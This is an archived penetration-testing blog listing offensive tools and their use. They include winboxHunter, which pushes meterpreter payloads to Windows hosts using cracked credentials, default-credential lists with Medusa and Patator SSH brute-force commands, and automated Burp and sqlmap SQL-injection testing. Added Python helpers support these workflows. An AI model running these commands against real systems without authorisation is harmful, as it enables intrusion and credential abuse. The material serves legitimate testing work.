Archive for the ‘Penetration Testing’ Category

winboxHunter

August 27, 2014

Prerequisites:

- Python 2.7
- Impacket (svn checkout http://impacket.googlecode.com/svn/trunk/ impacket-read-only)
- Ruby
- Veil Evasion (git clone https://github.com/Veil-Framework/Veil-Evasion.git)

Description:

If you are working on a penetration test remotely, it's sometimes hard to determine when the users start work or connect their laptops to the network.

winboxHunter is useful if you have managed to capture and crack a set of NTLM credentials and want to run Metasploit against the corresponding Windows boxes as and when they are connected to the network.

winboxHunter listens for NBNS broadcast packets; when a new Windows box announces itself on the network, winboxHunter uses the Impacket scripts (psexec.py and wmiexec.py) with the captured credentials to push an executable onto the box and run it.

In the background, winboxHunter runs Metasploit with a payload handler (multi/handler) that listens for the incoming connections from the boxes.

You might want to modify autorunCmd.rc to specify the Metasploit commands you want to run on a pwned box when it connects back to Metasploit.

See meterpreter.rc and autorunCmd.rc for more details.

winboxHunter keeps track of the hosts it has already pushed to, so if a host changes its IP address after a DHCP lease expires, it will not attempt to exploit the same box twice.
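As an added illustration of the two mechanisms just described, here is a Python sketch (not winboxHunter's own code, which is Ruby) that decodes an NBNS name-registration broadcast on UDP/137 and keys the seen-host list on the NetBIOS name rather than the IP address, so a DHCP re-lease does not retrigger the push. The packet builder, the hostname and the IP addresses are constructed for the demo, and keying on the NetBIOS name is an assumption about how winboxHunter avoids double exploitation; the page does not say.

```python
import socket
import struct

NBNS_PORT = 137
OPCODE_REGISTRATION = 5         # RFC 1002 NAME REGISTRATION REQUEST
SUFFIX_WORKSTATION = 0x00       # <00> workstation service, registered when a box boots


def encode_netbios_name(name, suffix=SUFFIX_WORKSTATION):
    """RFC 1001 first-level encoding: name space-padded to 15 bytes plus a 1-byte
    suffix; every byte becomes two characters in 'A'..'P', one per nibble."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    return "".join(chr(ord("A") + (b >> 4)) + chr(ord("A") + (b & 0x0F)) for b in raw)


def decode_netbios_name(encoded):
    """Inverse of encode_netbios_name; returns (name, suffix)."""
    if len(encoded) != 32:
        raise ValueError("encoded NetBIOS name must be 32 characters")
    raw = bytearray()
    for hi, lo in zip(encoded[0::2], encoded[1::2]):
        h, l = ord(hi) - ord("A"), ord(lo) - ord("A")
        if not (0 <= h <= 15 and 0 <= l <= 15):
            raise ValueError("not a first-level encoded name")
        raw.append((h << 4) | l)
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_registration(name, ip, suffix=SUFFIX_WORKSTATION, txid=0x1234):
    """Constructed NBNS registration broadcast (RFC 1002 4.2.2), demo input only."""
    flags = (OPCODE_REGISTRATION << 11) | 0x0100 | 0x0010   # opcode 5, RD, B (broadcast)
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 1)  # QDCOUNT=1, ARCOUNT=1
    question = bytes([32]) + encode_netbios_name(name, suffix).encode("ascii") + b"\x00"
    question += struct.pack("!HH", 0x0020, 0x0001)            # QTYPE NB, QCLASS IN
    # Additional record: pointer to QNAME at offset 12, type NB, class IN, TTL,
    # RDLENGTH 6, NB_FLAGS (unique name, B-node) and the IP the host claims.
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 0x0020, 0x0001, 300000, 6)
    rr += struct.pack("!H", 0x0000) + socket.inet_aton(ip)
    return header + question + rr


def _skip_name(packet, off):
    """Advance past a DNS-style name: either labels or a 2-byte compression pointer."""
    if packet[off] & 0xC0 == 0xC0:
        return off + 2
    while packet[off] != 0:
        off += 1 + packet[off]
    return off + 1


def parse_registration(packet):
    """Return (name, suffix, ip) for a registration request, None for anything else."""
    if len(packet) < 12:
        return None
    _txid, flags, qd, _an, _ns, ar = struct.unpack("!HHHHHH", packet[:12])
    opcode = (flags >> 11) & 0x0F
    if flags & 0x8000 or opcode != OPCODE_REGISTRATION or qd != 1 or ar != 1:
        return None
    try:
        if packet[12] != 32:
            return None
        name, suffix = decode_netbios_name(packet[13:45].decode("ascii"))
        off = _skip_name(packet, 45) + 4        # rest of QNAME, then QTYPE/QCLASS
        off = _skip_name(packet, off)           # additional record's NAME
        _rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", packet[off:off + 10])
        if rdlen < 6:
            return None
        ip = socket.inet_ntoa(packet[off + 12:off + 16])   # skip 2-byte NB_FLAGS
        return name, suffix, ip
    except (IndexError, ValueError, UnicodeDecodeError, struct.error, OSError):
        return None


class HostTracker:
    """Keys seen hosts on NetBIOS name, not IP, so a DHCP re-lease is not a new host."""

    def __init__(self):
        self.seen = {}                             # name -> most recently claimed IP

    def observe(self, packet):
        """(name, ip, is_new) for a workstation-service registration, else None."""
        parsed = parse_registration(packet)
        if parsed is None or parsed[1] != SUFFIX_WORKSTATION:
            return None
        name, _suffix, ip = parsed
        is_new = name not in self.seen
        self.seen[name] = ip
        return name, ip, is_new


def listen(tracker, on_new_host):
    """Bind UDP/137 (needs root) and call on_new_host(name, ip) once per new box."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", NBNS_PORT))
    while True:
        packet, _addr = sock.recvfrom(1024)
        result = tracker.observe(packet)
        if result and result[2]:
            on_new_host(result[0], result[1])


if __name__ == "__main__":
    t = HostTracker()
    first = t.observe(build_registration("WS-FINANCE01", "10.0.0.55"))   # constructed
    again = t.observe(build_registration("WS-FINANCE01", "10.0.0.77"))   # same box, new lease
    print(first, again)   # ('WS-FINANCE01', '10.0.0.55', True) ('WS-FINANCE01', '10.0.0.77', False)
```

Only the <00> workstation registration is acted on; a server-service <20> registration from the same box is ignored so one boot does not produce two pushes. Anything that is not a well-formed registration request (responses, queries, truncated datagrams) is dropped silently.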

Format of password.txt

domain/username password

Instructions:

Meterpreter executable

You only need to use one of the 2 options below:

- use your own meterpreter payload executable via the -e or --exe argument (payload=windows/meterpreter/reverse_https, rport=8443), or
- use the -n or --enableVeil argument to generate a meterpreter payload executable with Veil Evasion

You can run winboxHunter using the sample command below:

ruby winboxHunter.rb -n -f password.txt -v

When you run winboxHunter, a GNU screen session named "msfscreen" is created and msfconsole is executed inside it. You can attach to the session with the command below:

screen -dr msfscreen

The source code for winboxHunter can be found at https://github.com/milo2012/winboxHunter

Medusa ‘combo’ word lists (default usernames and passwords) for SSH and Telnet services

August 16, 2014

Cirt.net is a useful resource that contains the default credentials for various devices.

I wrote a script that crawls, parses and extracts the credentials from cirt.net and outputs them in the "combo" format required by Medusa. Medusa is a parallel brute-force tool for numerous services such as MySQL, SMB, SSH, Telnet etc.

Currently, only SSH and Telnet related credentials are extracted from cirt.net.

You can download the “combo” word lists for ssh and telnet via the direct links below.

SSH combo list for Medusa

https://github.com/milo2012/pentest_scripts/blob/master/default_accounts_wordlist/wordList_ssh.txt

Telnet combo list for Medusa

https://github.com/milo2012/pentest_scripts/blob/master/default_accounts_wordlist/wordList_telnet.txt

Also available are combined users.txt and passwords.txt files that you can use with Patator (https://code.google.com/p/patator/), which is another awesome brute-force tool.

Sample command for a Medusa "combo" SSH attack:

medusa -M ssh -C wordList_ssh.txt -H port22.txt

If you would like to play around with the Python script, you can download it from the location below.

Github

https://github.com/milo2012/pentest_scripts/tree/master/default_accounts_wordlist

Patator is another awesome tool that you can use for brute-forcing SSH logins:

https://code.google.com/p/patator/

Sample command for a Patator SSH attack:

patator.py ssh_login host=10.0.0.1 user=FILE0 password=FILE1 0=users.txt 1=passwords.txt -x ignore:mesg='Authentication failed.'
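The conversion step that sits between the crawl and the two commands above, as an added Python example rather than the crawler script from the repository: it takes extracted (vendor, protocol, user, password) rows, keeps only the SSH/Telnet ones, de-duplicates them, and emits Medusa combo lines plus the users.txt/passwords.txt pair for Patator's FILE0 x FILE1 product. The rows are constructed here; cirt.net's real markup is not reproduced, and "(none)" as its marker for an empty password is an assumption. The treatment of an empty password field is as documented for Medusa's -C option (an empty field falls back to the command line), so blank passwords are kept aside for a separate run with -e n; verify that against your Medusa version.

```python
# Constructed rows in the shape the crawler would hand over: (vendor, protocol, user, password).
SAMPLE_ROWS = [
    ("Cisco", "Telnet", "cisco", "cisco"),
    ("Cisco", "SSH", "admin", "(none)"),      # blank password (marker is an assumption)
    ("Juniper", "SSH", "root", "(none)"),
    ("3Com", "Telnet", "admin", "admin"),
    ("3Com", "HTTP", "admin", "admin"),       # filtered out: not SSH/Telnet
    ("HP", "Telnet", "(none)", "admin"),      # no username: Medusa cannot use it
    ("Cisco", "telnet", "cisco", "cisco"),    # duplicate, protocol case differs
]

BLANK_MARKERS = {"", "(none)", "(blank)", "none"}


def normalise(value):
    """Map the site's blank markers onto an empty string and strip whitespace."""
    v = value.strip()
    return "" if v.lower() in BLANK_MARKERS else v


def extract_pairs(rows, protocol):
    """Ordered, de-duplicated (user, password) pairs for one protocol."""
    seen, pairs = set(), []
    for _vendor, proto, user, password in rows:
        if proto.lower() != protocol.lower():
            continue
        pair = (normalise(user), normalise(password))
        if pair[0] == "" or pair in seen:
            continue
        seen.add(pair)
        pairs.append(pair)
    return pairs


def medusa_combo(pairs):
    """Medusa -C lines are host:user:password; an empty host means 'use -h/-H'.
    An empty password field would likewise fall back to -p/-P, so users with a
    blank default password are returned separately to be run with -e n."""
    lines, null_password_users = [], []
    for user, password in pairs:
        if password == "":
            null_password_users.append(user)
        else:
            lines.append(":%s:%s" % (user, password))
    return lines, null_password_users


def patator_lists(pairs):
    """users.txt / passwords.txt for patator's user=FILE0 password=FILE1 product."""
    users = sorted({u for u, _ in pairs})
    passwords = sorted({p for _, p in pairs if p != ""})
    return users, passwords


def render_outputs(rows, protocol):
    """Filename -> file contents, using the repository's wordList_<proto>.txt naming."""
    pairs = extract_pairs(rows, protocol)
    combo, null_users = medusa_combo(pairs)
    users, passwords = patator_lists(pairs)
    return {
        "wordList_%s.txt" % protocol: "\n".join(combo) + "\n",
        "nullpass_users_%s.txt" % protocol: "\n".join(null_users) + "\n",
        "users.txt": "\n".join(users) + "\n",
        "passwords.txt": "\n".join(passwords) + "\n",
    }


if __name__ == "__main__":
    for proto in ("ssh", "telnet"):
        for fname, body in render_outputs(SAMPLE_ROWS, proto).items():
            print("== %s ==\n%s" % (fname, body))
```

The Patator lists are a cartesian product, so they grow much faster than the combo file; the combo file preserves the vendor pairing (cisco/cisco, not cisco/admin) and is the better first pass when the host count is large.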

Shoutout

Special shoutout to Cirt.net for maintaining and providing the extensive database of default credentials at cirt.net/passwords

Extended functionality for Burp Plugin – Carbonator

August 4, 2014

I wrote a script to extend the functions of the Burp plugin Carbonator.

Carbonator is an awesome script by Integris Security. It is written in Jython, which is easy for me to understand.

It's similar to Sodapop by Redspin. However, the Sodapop script seems broken now.

Below is a link to Sodapop by Redspin

http://www.redspin.com/blog/2010/09/20/advanced-burp-suite-automation-2/

Below is a description of Carbonator from their website:

Carbonator's purpose is to enable the ability to automate the vulnerability scanning of a large number of web applications.
A single command from a command line can now produce volumes of vulnerability information.

Carbonator can be found here

https://www.integrissecurity.com/index.php?resources=Carbonator

Burp Carbonator Extension Mod

I made some additional tweaks to the original carbonator.py script as well as created my own launch_burp.py run script.

The additional functionalities that I have included are:
1. Run Burp/Carbonator against a file containing a list of domain names/IPs/URLs. Below is a screenshot of the file format.

Carbonator file input containing domain names/urls/ip

2. Run a Bing lookup against the IP address of the domain name to find other websites hosted on the same IP address (using the IP:x.x.x.x keyword in Bing) and run Burp/Carbonator against these additional websites. There seem to be some false positives in Bing's results, so the script checks that each discovered domain name actually resolves to the same IP address.

3. Search Google for links belonging to the domain name (using the site:domain.com keyword) and run Burp/Carbonator against these links. You might find additional website content/links compared to crawling http://www.domain.com alone.
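The two pieces of glue behind items 1 and 2, as an added Python example that is not the code from the carbonator mod: normalising an input file of mixed domain names, IPs and URLs into scan targets, and the false-positive check that keeps a Bing "IP:" result only if the name really resolves to the target's address. The input format is assumed to be one entry per line (the screenshot is not reproduced here), the Bing results and the DNS answers are constructed, and the resolver is injectable so the check runs offline; with the default resolver it performs real lookups.

```python
import socket
from urllib.parse import urlsplit


def parse_target_line(line):
    """One input line (bare domain, bare IPv4 or full URL) -> (scheme, host, port) or None.
    One target per line, '#' comments allowed, is an assumption about the file format."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if "://" not in line:
        line = "http://" + line
    try:
        parts = urlsplit(line)
        host, port = parts.hostname, parts.port
    except ValueError:
        return None
    if not host:
        return None
    scheme = parts.scheme.lower()
    return scheme, host.lower(), port or (443 if scheme == "https" else 80)


def load_targets(text):
    """Parse the whole input file, dropping blank lines, comments and duplicates."""
    targets, seen = [], set()
    for line in text.splitlines():
        t = parse_target_line(line)
        if t and t not in seen:
            seen.add(t)
            targets.append(t)
    return targets


def hosts_on_same_ip(target_host, candidates, resolver=socket.gethostbyname):
    """Filter names returned by a Bing 'IP:x.x.x.x' search: keep only those that
    resolve to the same address as target_host. Names that no longer resolve
    (stale index entries) and the target itself are dropped."""
    try:
        target_ip = resolver(target_host)
    except OSError:
        return []
    kept = []
    for cand in candidates:
        cand = cand.lower().rstrip(".")
        if cand == target_host.lower():
            continue
        try:
            if resolver(cand) == target_ip and cand not in kept:
                kept.append(cand)
        except OSError:
            continue
    return kept


# Constructed DNS answers and a resolver over them, so the demo needs no network.
FAKE_DNS = {
    "www.example.com": "203.0.113.10",
    "shop.example.com": "203.0.113.10",
    "old.example.net": "203.0.113.99",
}


def fake_resolver(hostname):
    if hostname in FAKE_DNS:
        return FAKE_DNS[hostname]
    raise socket.gaierror(-2, "Name or service not known")


if __name__ == "__main__":
    sample_file = "www.example.com\n203.0.113.10\nhttps://app.example.com:8443/login\n# note\nwww.example.com\n"
    for scheme, host, port in load_targets(sample_file):
        print("%s://%s:%d" % (scheme, host, port))
    bing_hits = ["shop.example.com", "old.example.net", "gone.example.org", "WWW.example.com."]  # constructed
    print(hosts_on_same_ip("www.example.com", bing_hits, fake_resolver))   # ['shop.example.com']
```

Resolving each candidate is the cheap check; it does not prove the virtual host is served by the same web server, so a second pass that requests / with the candidate Host header and compares the response is worth adding before spending scan time on it.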

My Github repo for the code is at https://github.com/milo2012/carbonator. Please feel free to send me your feedback/comments. Thank you for reading.

Automating SQL Injection with Burp, Sqlmap and GDS Burp API

June 26, 2012

I came across the GDS Burp API, which seems like a very useful tool for parsing Burp Proxy logs. The GDS Burp API exposes a Python object interface to the requests/responses recorded by Burp. The link below provides a very good introduction to the API.

http://blog.gdssecurity.com/labs/2010/8/10/constricting-the-web-the-gds-burp-api.html

I wrote a simple script that uses the API to parse the Burp proxy logs and hands the requests to sqlmap, automating SQL injection testing of all GET and POST parameters while skipping all URLs without any parameters.

1. Clone the GDSSecurity burpee repository: git clone https://github.com/GDSSecurity/burpee.git

2. Download burpSQL.py from https://github.com/milo2012/burpSQL into the burpee folder

3. Next, configure proxy logging in Burp Suite

4. Change the proxy settings of your browser to 127.0.0.1:8080

5. Crawl the website with the OWASP Ajax Crawling Tool, spider it with Burp Suite, or browse it manually.

Below are the command line options for burpSQL

6. The above is pretty self explanatory. If your Burp proxy log is cluttered with URLs from multiple domains, you can restrict the SQL injection testing to specific domains using the --domain switch.
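The selection logic the steps above describe, written out as an added Python example. It is not burpSQL's code and does not use the GDS Burp API: a small raw-request parser stands in for the objects the API would return, the requests are constructed, and sqlmap is only assembled as an argv list, not executed. One detail beyond what the post states: requests are de-duplicated on (method, host, path, parameter names), so a log that holds fifty searches with different query values produces one sqlmap run, not fifty.

```python
from urllib.parse import urlsplit, parse_qsl

# Constructed raw requests standing in for entries read from a Burp proxy log.
SAMPLE_REQUESTS = [
    "GET /search?q=test&page=2 HTTP/1.1\r\nHost: app.example.com\r\n\r\n",
    "GET /about HTTP/1.1\r\nHost: app.example.com\r\n\r\n",                       # no parameters
    "POST /login HTTP/1.1\r\nHost: app.example.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 29\r\n\r\n"
    "username=bob&password=secret1",
    "GET /search?q=other&page=9 HTTP/1.1\r\nHost: app.example.com\r\n\r\n",     # same endpoint again
    "GET /item?id=7 HTTP/1.1\r\nHost: cdn.other.example\r\n\r\n",                # out of scope
]


def parse_request(raw, scheme="http"):
    """Split a raw HTTP/1.1 request into the pieces sqlmap needs."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        k, _, v = h.partition(":")
        headers[k.strip().lower()] = v.strip()
    parts = urlsplit(path)
    get_params = dict(parse_qsl(parts.query, keep_blank_values=True))
    post_params = {}
    ctype = headers.get("content-type", "")
    if method.upper() == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        post_params = dict(parse_qsl(body, keep_blank_values=True))
    return {"method": method.upper(), "host": headers.get("host", ""), "path": parts.path,
            "query": parts.query, "get": get_params, "post": post_params,
            "body": body, "scheme": scheme}


def in_scope(host, domains):
    """True when host equals one of the domains or is a subdomain of it."""
    return any(host == d or host.endswith("." + d) for d in domains)


def select_targets(requests, domains=None):
    """Drop parameterless requests and out-of-scope hosts, and test each
    (method, host, path, parameter-name set) only once."""
    seen, targets = set(), []
    for raw in requests:
        r = parse_request(raw)
        if not r["get"] and not r["post"]:
            continue
        if domains and not in_scope(r["host"], domains):
            continue
        sig = (r["method"], r["host"], r["path"],
               tuple(sorted(r["get"])), tuple(sorted(r["post"])))
        if sig in seen:
            continue
        seen.add(sig)
        targets.append(r)
    return targets


def sqlmap_argv(r):
    """sqlmap command line for one selected request (not executed here)."""
    url = "%s://%s%s" % (r["scheme"], r["host"], r["path"])
    if r["query"]:
        url += "?" + r["query"]
    params = ",".join(sorted(list(r["get"]) + list(r["post"])))
    argv = ["sqlmap", "-u", url, "--batch", "-p", params]
    if r["post"]:
        argv += ["--data", r["body"]]
    return argv


if __name__ == "__main__":
    for target in select_targets(SAMPLE_REQUESTS, domains=["example.com"]):
        print(" ".join(sqlmap_argv(target)))
```

Passing the parameter names with -p keeps sqlmap from re-discovering them and makes the run reproducible; --batch accepts sqlmap's defaults so the loop does not block on prompts. Cookies and custom headers from the log are deliberately not forwarded here; add them with --cookie/--headers if the application needs a session.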

Drop me a message if you have any suggestions or comments.  Thank you !

OWASP Ajax Crawling Tool (Good Companion Tool to Burpsuite)

December 26, 2011

OWASP Ajax Crawling Tool (ACT) is an awesome companion to Burp Suite. It allows you to crawl Ajax websites, a feature missing from Burp Suite. Both are must-have tools for penetration testing modern Ajax websites.

The official website for ACT is https://www.owasp.org/index.php/OWASP_AJAX_Crawling_Tool

The current version of ACT, 0.1a, seems to have issues crawling some Ajax websites due to problems in its dependencies.

I have submitted the bugfixes to the website but it will take some time for the changes to be committed.

Below are screenshots of the crawl results before and after the patch.

Before the patch

After the patch

As shown in the screenshot, 4 extra links were discovered after the patch.

I have also added the ability to specify the proxy server in command line mode.

Below is a temporary download link for the patched ACT if you can't wait for the changes to be committed on the main site.

https://www.dropbox.com/s/gosq97z5vjlr09f/act-new.jar

Categories: Penetration Testing